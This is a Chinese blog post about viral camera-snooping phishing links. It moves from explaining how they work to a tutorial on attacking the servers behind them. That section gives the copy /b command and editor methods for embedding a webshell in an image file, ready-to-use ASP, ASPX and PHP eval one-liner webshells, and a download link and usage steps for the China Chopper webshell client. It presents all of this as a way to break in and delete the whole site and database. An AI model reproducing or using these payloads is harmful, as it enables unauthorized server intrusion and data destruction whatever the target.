标签搜索

最近流行的偷拍链接?带你入侵破解它

百趣云
2021-05-03 / 0 评论 / 38 阅读 / 正在检测是否收录...
温馨提示:
本文最后更新于2021年05月03日,已超过49天没有更新,若内容或图片失效,请留言反馈。

导读

最近抖音上挺流行的点击链接拍照对方照片,我想到了两年前流行的app得到手机摄像头权限获取机主照片,带着这个话题在各大娱乐网上面找到了该源码,并进行了一波分析

分析

其实原理很简单,给网页一个摄像头的权限即可,然后通过sc.php的文件生成链接,发送给被偷拍的用户,然后通过image文件夹里的特定id查看照片,你认为我点开网页不给他权限不就可以了吗?其实大部分app自带权限,例如我们平时经常使用到的微信,他本身就是自带摄像头相机权限的,此时我们点开直接就不法分子获取到了照片,这个照片是实时拍照的,被拍后无法撤销,立即上传至服务器,然后对方威胁什么的

破解

其实破解这种网页也是挺简单的,每个链接都会有一个特定的id,这个id就是用来索引照片的路径,我可以顺着sc.php的查询到文件夹的路径,一般自带删除照片,如果没有删除照片那该如何处置呢?寻找一位程序员朋友,既然网页能把照片上传到服务器,那肯定是有上传通道的,此时我们通过图片马对服务器进行上传木马,并且拿到服务器权限,直接上菜刀进行连接,入侵服务器进行全站删除并删除数据库

1、copy命令
CMD命令:

copy 1.jpg/b+1.php/a 2.jpg

2、PS软件
PS打开图片,在文件—>文件简介里插入需要的木马代码,最后:文件—>保存【保存:覆盖原文件,也可以另存为其他格式】。

3、edjpg软件
将图片直接拖到edjpg.exe上,在弹出窗口内输入一句话木马即可。

4、十六进制编辑器编辑添加
用010 Editor或winhex等十六进制编辑器打开图片,将一句话木马插入到右边最底层或最上层后保存。

5、常见的一句话

asp一句话

<%eval request("pass")%>

aspx一句话

<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

php一句话

<?php @eval($_POST["pass"]);?>

中国菜刀简介

中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!程序大小:214K,在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。

中国菜刀下载
https://github.com/raddyfiy/caidao-official-version 需要访问国外网站下载。

中国菜刀的使用
地址:首先,添加webshell。注意点: 地址后面需要添加你一句话的密码,编码格式需要注意

结尾

站长在这里提醒大家,不要点击陌生人的链接或者软件,若提示摄像头权限一定要及时删除并举报到12315平台,Jakcy祝大家五一快乐!

0

评论 (0)

取消